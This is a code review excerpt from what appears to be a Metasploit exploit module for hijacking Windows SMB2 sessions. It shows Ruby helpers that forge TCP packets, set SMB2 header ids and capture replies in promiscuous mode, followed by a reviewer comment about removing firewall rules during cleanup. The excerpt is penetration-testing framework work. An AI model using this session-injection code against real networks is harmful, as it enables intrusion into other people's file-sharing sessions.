modules/exploits/windows/smb/smb_shadow.rb

```diff
@@ -0,0 +1,694 @@
+    request.buffer.delete_pending = 1
+    request.file_id = response_smb2.file_id
+    packet = PacketFu::TCPPacket.new(eth: eth_header, ip: ip_header, tcp: make_tcp_header(response))
+    packet.payload = "#{[request.to_binary_s.size].pack('N')}#{request.to_binary_s}"
+    response = get_response(packet)
+    return true # Done.
+  end
+
+  # This sends a packet and captures the response.
+  def get_response(packet)
+    packet.recalc
+    rc = PacketFu::Capture.new(iface: @interface, promisc: true)
+    rc.capture
+    rc.stream.setfilter("ether dst #{@mac} and not ether src #{@mac} and src port 445 and tcp[tcpflags] & (tcp-syn) == 0 and tcp[tcpflags] & (tcp-ack) != 0 and tcp[((tcp[12] >> 4) * 4) + 4 : 4] = 0xfe534d42 and tcp[4:4] = #{packet.tcp_header.tcp_ack}")
+    packet.to_w(@interface)
+    rc.stream.each_data do |data|
+      packet = PacketFu::Packet.parse(data)
+      if packet.instance_of?(PacketFu::TCPPacket)
+        break packet
+      end
+    end
+  end
+
+  # This generates the TCP header for a new packet based on the previous one.
+  def make_tcp_header(response)
+    PacketFu::TCPHeader.new(
+      tcp_src: response.tcp_header.tcp_dst,
+      tcp_dst: response.tcp_header.tcp_src,
+      tcp_seq: response.tcp_header.tcp_ack,
+      tcp_ack: response.tcp_header.tcp_seq + response.payload.size,
+      tcp_win: response.tcp_header.tcp_win,
+      tcp_flags: { ack: 1, psh: 1 }
+    )
+  end
+
+  # This sets the smb2 header flags on the request with the provided values.
+  def set_request_smb2_header_flags(request, tree_id, process_id, response_smb2)
+    request.smb2_header.tree_id = tree_id
+    request.smb2_header.process_id = process_id
+    request.smb2_header.credit_charge = 1
+    request.smb2_header.credits = 256
+    request.smb2_header.message_id = response_smb2.smb2_header.message_id + 1
+    request.smb2_header.session_id = response_smb2.smb2_header.session_id
+    nil
+  end
+
+  # This converts a string to a binary mac.
+  def str2mac(str)
+    # [str.split(':').join].pack('H*')
+    Rex::Socket.eth_aton(str)
+  end
+
+  # This converts a binary mac to a string.
+  def mac2str(mac)
+    # mac.to_s.bytes.map { |s| s.to_s(16).rjust(2, '0') }.join(':')
+    Rex::Socket.eth_ntoa(mac)
+  end
+
+  # This converts a string to a binary ip.
+  def str2ip(str)
+    # str.split('.').map(&:to_i).pack('C*')
+    Rex::Socket.addr_aton(str)
+  end
+
+  # This converts a binary ip to a string.
+  def ip2str(ip)
+    # ip.bytes.map(&:to_s).join('.')
+    Rex::Socket.addr_ntoa(ip)
+  end
+
+  # This converts an integer to a binary ip.
+  def int2ip(int)
+    # [int].pack('N')
+    Rex::Socket.addr_iton(int)
+  end
+
+  # This cleans up and exits all the active threads.
+  def cleanup
+    print_status 'Cleaning Up...'
+    @syn_capture_thread.exit if @syn_capture_thread
+    @ack_capture_thread.exit if @ack_capture_thread
+    @main_threads.map(&:exit) if @main_threads
+    print_status 'Cleaned Up.'
```

Comment:
I think the cleanup method should also remove the firewall rules (if any) to revert any changes made to the user's system.